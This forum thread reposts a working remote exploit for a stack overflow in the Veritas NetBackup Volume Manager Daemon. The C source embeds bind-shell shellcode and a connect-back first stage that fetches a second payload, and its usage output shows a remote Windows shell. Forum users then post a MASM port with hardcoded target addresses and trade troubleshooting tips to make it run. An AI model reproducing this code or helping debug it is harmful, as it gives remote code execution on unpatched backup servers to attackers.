/* DESCRIPTION Veritas NetBackup Stack Overflow (tcp/13701) "Volume Manager Daemon" Module Advisories http://www.idefense.com/intelligence/vulnerabilities/display.php?id=3 36 http://www.frsirt.com/english/advisories/2005/2349 USAGE C:\NetBackup>nb 192.168.0.2 4444 192.168.0.200 0 Veritas NetBackup v4/v5 "Volume Manager Daemon" Stack Overflow. Sending first buffer. Sending second buffer. C:\NetBackup>nc 192.168.0.200 4444 Microsoft Windows 2000 [versie 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp. C:\WINNT\system32> INFORMATION I wrote this just for educational purposes . Because the buffer is only very small, I had to write small shellcode. The code is less than 100 bytes, and there are 6 bytes left. So there is still space to improve it. The stack seems to be static, every run at the exact same location. I used the Import Address Table (that looks like this): (taken from v5.1) Import Address Table 00447230 (send) 00447234 (recv) 00447238 (accept) 00447240 (listen) 0044724C (connect) 00447268 (closesocket) 00447284 (bind) 00447288 (socket) Using that shellcode I retrieve the "second" shellcode. This can be ANY code, and ANY size. No limitations. Tested on Windows 2000 Professional, Service Pack 4, Dutch. Tested on Veritas NetBackup 4.5, 5.0, 5.1 with some Maintenance Packs. (not all). Enjoy. */ #include <winsock2.h> #include <stdio.h> #pragma comment(lib,"ws2_32") DWORD WINAPI SendShellcode(LPVOID lpParam); int iLocalOpenPort; /* win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com */ char szShellcode[] = "\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd2" "\x4a\xe7\xed\x83\xeb\xfc\xe2\xf4\x2e\x20\x0c\xa0\x3a\xb3\x18\x12" "\x2d\x2a\x6c\x81\xf6\x6e\x6c\xa8\xee\xc1\x9b\xe8\xaa\x4b\x08\x66" "\x9d\x52\x6c\xb2\xf2\x4b\x0c\xa4\x59\x7e\x6c\xec\x3c\x7b\x27\x74" "\x7e\xce\x27\x99\xd5\x8b\x2d\xe0\xd3\x88\x0c\x19\xe9\x1e\xc3\xc5" "\xa7\xaf\x6c\xb2\xf6\x4b\x0c\x8b\x59\x46\xac\x66\x8d\x56\xe6\x06" "\xd1\x66\x6c\x64\xbe\x6e\xfb\x8c\x11\x7b\x3c\x89\x59\x09\xd7\x66" "\x92\x46\x6c\x9d\xce\xe7\x6c\xad\xda\x14\x8f\x63\x9c\x44\x0b\xbd" "\x2d\x9c\x81\xbe\xb4\x22\xd4\xdf\xba\x3d\x94\xdf\x8d\x1e\x18\x3d" "\xba\x81\x0a\x11\xe9\x1a\x18\x3b\x8d\xc3\x02\x8b\x53\xa7\xef\xef" "\x87\x20\xe5\x12\x02\x22\x3e\xe4\x27\xe7\xb0\x12\x04\x19\xb4\xbe" "\x81\x19\xa4\xbe\x91\x19\x18\x3d\xb4\x22\xf6\xb1\xb4\x19\x6e\x0c" "\x47\x22\x43\xf7\xa2\x8d\xb0\x12\x04\x20\xf7\xbc\x87\xb5\x37\x85" "\x76\xe7\xc9\x04\x85\xb5\x31\xbe\x87\xb5\x37\x85\x37\x03\x61\xa4" "\x85\xb5\x31\xbd\x86\x1e\xb2\x12\x02\xd9\x8f\x0a\xab\x8c\x9e\xba" "\x2d\x9c\xb2\x12\x02\x2c\x8d\x89\xb4\x22\x84\x80\x5b\xaf\x8d\xbd" "\x8b\x63\x2b\x64\x35\x20\xa3\x64\x30\x7b\x27\x1e\x78\xb4\xa5\xc0" "\x2c\x08\xcb\x7e\x5f\x30\xdf\x46\x79\xe1\x8f\x9f\x2c\xf9\xf1\x12" "\xa7\x0e\x18\x3b\x89\x1d\xb5\xbc\x83\x1b\x8d\xec\x83\x1b\xb2\xbc" "\x2d\x9a\x8f\x40\x0b\x4f\x29\xbe\x2d\x9c\x8d\x12\x2d\x7d\x18\x3d" "\x59\x1d\x1b\x6e\x16\x2e\x18\x3b\x80\xb5\x37\x85\x22\xc0\xe3\xb2" "\x81\xb5\x31\x12\x02\x4a\xe7\xed"; char szBuffer[] = // We cannot use this small part. "a" "AAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAA" // Since the buffer is so small, we even need a part of // the SOCKADDR_IN structure. No problem. // struct sockaddr_in { "BB" // sin_family "BB" // sin_port "BBBB" // in_addr // "BBBBBBBB" // sin_zero // } // 'START' // Move the stackpointer. (0x0012F??? -> 0x0012F000) "\xC1\xEC\x0C" // SHR ESP, 0x0C "\xC1\xE4\x0C" // SHL ESP, 0x0C // Call socket(). "\x33\xDB" // XOR EBX, EBX "\x53" // PUSH EBX "\x43" // INC EBX "\x53" // PUSH EBX "\x43" // INC EBX "\x53" // PUSH EBX "\xBB\x88\x72\x44\x00" // MOV EBX, 447288 [socket()] "\xFF\x13" // JMP DWORD PTR [EBX] "\x8B\xF8" // MOV EDI, EAX // [edi -> socket] // Call connect(). "\x33\xDB" // XOR EBX, EBX "\xB3\x16" // MOV BL, 16 "\x53" // PUSH EBX "\xBB\x60\xF3\x12\x00" // MOV EBX, 12F360 "\x53" // PUSH EBX "\x57" // PUSH EDI "\xBB\x4C\x72\x44\x00" // MOV EBX, 44724C [connect()] "\xFF\x13" // JMP DWORD PTR [EBX] // We need space. "\x8B\xD4" // MOV EDX, ESP "\x80\xC6\x01" // ADD DH, 1 // Call recv(). "\x33\xDB" // XOR EBX, EBX "\x53" // PUSH EBX "\x43" // INC EBX "\xC1\xE3\x10" // SHL EBX, 8 [1 -> 65536] "\x53" // PUSH EBX "\x52" // PUSH EDX "\x57" // PUSH EDI "\xBB\x34\x72\x44\x00" // MOV EBX, 447234 [recv()] "\xFF\x13" // JMP DWORD PTR [EBX] // And again. "\x8B\xD4" // MOV EDX, ESP "\x80\xC6\x01" // ADD DH, 1 // Jump to our shellcode. "\xFF\xE2" // JMP EDX "O" "W" "N" "E" "D" "!" "\x68\xF3\x12\x00" // Here our code starts . "\x00\xF0\x12\x00"; // Just a random readable address. // This is the NOT-interesting part . DWORD main(int argc, char *argv[]) { printf("Veritas NetBackup v4/v5/v6 \"Volume Manager Daemon\" Stack Overflow.\n"); // We need a local port and ip because our first buffer is way too small // to contain our complete shellcode. We use a small shellcode first to // retrieve the second shellcode. The only method that fitted as first // shellcode was a connect-back shellcode. For the second we got LOADS of // space . if (argc<5) { printf("Usage: %s <local ip> <local port> <remote ip> <type>\n\n", argv[0]); printf("Types (tested):\n"); printf(" 0 - NetBackup v5.0_1A\n"); printf(" NetBackup v5.0_2\n"); printf(" NetBackup v5.0_3\n"); printf(" NetBackup v5.1\n\n"); return NULL; } WSADATA wsa; WSAStartup(MAKEWORD(2,0), &wsa); sockaddr_in strTarget; memset(&strTarget, 0, sizeof(strTarget)); strTarget.sin_addr.s_addr = inet_addr(argv[3]); strTarget.sin_family = AF_INET; strTarget.sin_port = htons(13701); iLocalOpenPort = atoi(argv[2]); HANDLE hStage2 = CreateThread(NULL, 0, SendShellcode, 0, 0, 0); SOCKET sTarget = socket(AF_INET, SOCK_STREAM, 0); int iResult = connect(sTarget, (struct sockaddr *)&strTarget, sizeof(strTarget)); if (iResult != SOCKET_ERROR) { printf("Sending first buffer.\n"); // Fill in the structure. unsigned long family = AF_INET; memcpy(szBuffer + 80, &family, 2); unsigned long port = htons(iLocalOpenPort); memcpy(szBuffer + 82, &port, 2); unsigned long ip = inet_addr(argv[1]); memcpy(szBuffer + 84, &ip, 4); send(sTarget, szBuffer, sizeof(szBuffer)-1, 0); closesocket(sTarget); } WaitForSingleObject(hStage2, 3000); WSACleanup(); return NULL; } DWORD WINAPI SendShellcode(LPVOID lpParam) { SOCKET sTarget; SOCKET sAccept; struct hostent *hp; struct sockaddr_in strTarget; struct sockaddr_in strAccept; int iStrSize = sizeof(strTarget); memset(&strTarget, 0, sizeof(strTarget)); strTarget.sin_addr.s_addr = INADDR_ANY; strTarget.sin_family = AF_INET; strTarget.sin_port = htons(iLocalOpenPort); sTarget = socket(AF_INET, SOCK_STREAM, 0); bind(sTarget, (struct sockaddr *)&strTarget, iStrSize); listen(sTarget, 2); sAccept = accept(sTarget, (struct sockaddr *)&strAccept, &iStrSize); if (sAccept != INVALID_SOCKET) { printf("Sending second buffer.\n"); send(sAccept, szShellcode, sizeof(szShellcode) - 1, 0); closesocket(sAccept); } return NULL; } // milw0rm.com [2006-01-16] ;=============================================================== Hey,all the above code has been translated into asm. the exe can't work. Please help me checking solecism. _40491904__rt_1.rar
.586 .model flat, stdcall option casemap :none ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>> include \masm32\include\windows.inc include \masm32\include\kernel32.inc include \masm32\include\Ws2_32.inc include \masm32\include\masm32.inc include \masm32\include\User32.inc include \masm32\include\debug.inc includelib \masm32\lib\User32.lib includelib \masm32\lib\kernel32.lib includelib \masm32\lib\Ws2_32.lib includelib \masm32\lib\masm32.lib includelib \masm32\lib\debug.lib include \masm32\macros\macros.asm ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>> .data? wsd WSADATA<?> strTarget sockaddr_in<?> strLocal sockaddr_in<?> iLocalOpenPort dd ? hStage2 dd ? sTarget dd ? ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>> .data szArgv1 db "100.160.1.99",0 szArgv2 db "4444",0 szArgv3 db "100.160.1.201",0 szArgv4 db "0",0 Msg1 db "Sending first buffer.",0 Msg2 db "Sending senond buffer.",0 szCaption db "Test",0 ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>> .code ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>> szShellcode db 43,201,131,233,176,217,238,217,116,36,244,91,129,115,19,210 db 74,231,237,131,235,252,226,244,46,32,12,160,58,179,24,18 db 45,42,108,129,246,110,108,168,238,193,155,232,170,75,08,102 db 157,82,108,178,242,75,12,164,89,126,108,236,60,123,39,116 db 126,206,39,153,213,139,45,224,211,136,12,25,233,30,195,197 db 167,175,108,178,246,75,12,139,89,70,172,102,141,86,230,06 db 209,102,108,100,190,110,251,140,17,123,60,137,89,9,215,102 db 146,70,108,157,206,231,108,173,218,20,143,99,156,68,11,189 db 45,156,129,190,180,34,212,223,186,61,148,223,141,30,24,61 db 186,129,10,17,233,26,24,59,141,195,02,139,83,167,239,239 db 135,32,229,18,02,34,62,228,39,231,176,18,04,25,180,190 db 129,25,164,190,145,25,24,61,180,34,246,177,180,25,110,12 db 71,34,67,247,162,141,176,18,04,32,247,188,135,181,55,133 db 118,231,201,04,133,181,49,190,135,181,55,133,55,03,97,164 db 133,181,49,189,134,30,178,18,02,217,143,10,171,140,158,186 db 45,156,178,18,02,44,141,137,180,34,132,128,91,175,141,189 db 139,99,43,100,53,32,163,100,48,123,39,30,120,180,165,192 db 44,08,203,126,95,48,223,70,121,225,143,159,44,249,241,18 db 167,14,24,59,137,29,181,188,131,27,141,236,131,27,178,188 db 45,154,143,64,11,79,41,190,45,156,141,18,45,125,24,61 db 89,29,27,110,22,46,24,59,128,181,55,133,34,192,227,178 db 129,181,49,18,02,74,231,237 szBuffer db "a" db "AAAAAAAAAAAAAAAAAAAA" db "AAAAAAAAAAAAAAAAAAAA" db "AAAAAAAAAAAAAAAAAAAA" db "AAAAAAAAAAAAAAAAAAA" db "BB" db "BB" db "BBBB" db 193,236,12 db 193,228,12 db 51,219 db 83 db 67 db 83 db 67 db 83 db 187,136,114,68,00 db 255,19 db 139,248 db 51,219 db 179,22 db 83 db 187,96,243,18,00 db 83 db 87 db 187,76,114,68,00 db 255,19 db 139,212 db 128,198,01 db 51,219 db 83 db 67 db 193,227,16 db 83 db 82 db 87 db 187,52,114,68,00 db 255,19 db 139,212 db 128,198,01 db 255,226 db "O" db "W" db "N" db "E" db "D" db "!" db 104,243,18,00 db 00,240,18,00 ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>> memcopy_ proc uses edi esi ebx pDest:dword, pSource:dword, sizeDat:dword mov ecx, sizeDat mov esi, pSource mov edi, pDest mov eax, ecx shr ecx, 2 rep movsd mov ecx, eax and ecx, 3 rep movsb ret memcopy_ endp ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>> memset proc uses edi pDest:dword, chres:dword, sizeDat:dword mov ecx, sizeDat xor eax, eax mov edi, pDest mov edx, ecx shr ecx, 2 rep stosd mov ecx, edx and ecx, 3 rep stosb ret memset endp ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>> SendShellCode proc LOCAL sTarget1 : SOCKET LOCAL sAccept1 : SOCKET LOCAL strTarget1: sockaddr_in LOCAL strAccept1: sockaddr_in invoke memset, addr strTarget1, 0, sizeof strTarget1 mov strTarget1.sin_family, AF_INET mov strTarget1.sin_addr, INADDR_ANY invoke htons, iLocalOpenPort mov strTarget1.sin_port, ax invoke socket, AF_INET, SOCK_STREAM, 0 mov sTarget1,eax invoke bind, sTarget1, addr strTarget1, sizeof strTarget1 invoke listen,sTarget1,2 PrintHex sTarget1 invoke accept,sTarget1,addr strAccept1,sizeof strAccept1 mov sAccept1,eax PrintHex sAccept1 .if sAccept1 != INVALID_SOCKET invoke MessageBox,NULL,ADDR Msg2,ADDR szCaption,MB_OK invoke send,sAccept1,offset szShellcode, sizeof szShellcode - 1,0 invoke closesocket,sAccept1 .endif ret SendShellCode endp ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>> start: invoke WSAStartup, 202h, addr wsd invoke memset, addr strTarget, 0, sizeof strTarget mov strTarget.sin_family, AF_INET invoke inet_addr,addr szArgv3 mov strTarget.sin_addr, eax invoke htons, 13701 mov strTarget.sin_port, ax invoke a2dw,addr szArgv2 mov iLocalOpenPort,eax invoke CreateThread, 0, 0, addr SendShellCode, 0, 0, 0 mov hStage2,eax invoke socket, AF_INET, SOCK_STREAM, 0 mov sTarget,eax invoke connect, sTarget, addr strTarget, sizeof strTarget .if eax != SOCKET_ERROR invoke MessageBox,NULL,ADDR Msg1,ADDR szCaption,MB_OK mov strLocal.sin_family, AF_INET invoke memcopy_, szBuffer+80, addr strLocal.sin_family, 2 invoke htons, iLocalOpenPort mov strLocal.sin_port, ax invoke memcopy_, szBuffer+82, addr strLocal.sin_port, 2 invoke inet_addr,addr szArgv1 mov strLocal.sin_addr, eax invoke memcopy_, szBuffer+84, addr strLocal.sin_addr, 4 invoke send,sTarget,offset szBuffer, sizeof szBuffer - 1,0 invoke closesocket,sTarget .endif invoke WaitForSingleObject,hStage2,3000 invoke WSACleanup invoke ExitProcess, 0 ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>> end start ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>
You can compile your C code into executable, than load it into OllyDbg and copy asm-listing from OllyDbg to your .asm file.
Hello,cresta Thanks for response Borland c++ [Linker Fatal Error] Fatal: Unable to open file 'WS2_32.OBJ'
;-------------------------------- push security_cookie call [ebp+@security_check_cookie] ;-------------------------------- the api help?
Hello,creata ;=================================================== invoke accept,hTsock,addr strAccept,sizeof strAccept ;<=Error mov hAsock,eax PrintHex hAsock ;=================================================== the code in frist buffer can't work on Target PC. ASM LINK: \masm32\bin\Link /subsystem:windows /section:.text,ERW %name%.obj is it right?
Hello,Аноним I used MS-VC to created exe file, but the code can't work. msg: "Veritas NetBackup v4/v5/v6 "Volume Manager Daemon" Stack Overflow. Sending first buffer." i didn't know why the second buffer can't be sent. regards
